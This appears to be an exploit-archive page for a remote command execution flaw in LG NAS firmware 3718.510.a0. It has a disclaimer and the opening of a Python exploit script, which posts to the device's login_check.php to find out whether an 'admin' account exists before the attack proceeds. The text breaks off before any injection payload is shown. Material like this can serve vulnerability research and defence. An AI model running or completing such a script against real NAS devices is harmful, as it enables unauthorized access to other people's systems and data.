Lg nas 3718.510.a0 remote command execution Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2018-07-31 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Lg nas 3718.510.a0 remote command execution is for educational purposes only and if it is used you will do on your own risk!
import sys
import argparse
import requests
from collections import OrderedDict
def checkUser(target):
# Exploiting this vulnerability requires a valid user account
# on the target NAS otherwise the vulnerable code is not executed
parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass'), ('mobile', 'false')])
r = requests.post("http://" + target + ":8000/en/php/login_check.php", data=parameters)
if r.text == "NG:WRONG PASSWORD\n":
print "[*] Valid user found: admin"
return 0
elif r.text == "NG:NO USER\n":
print "[*] User not found: admin"
sys.exit(1)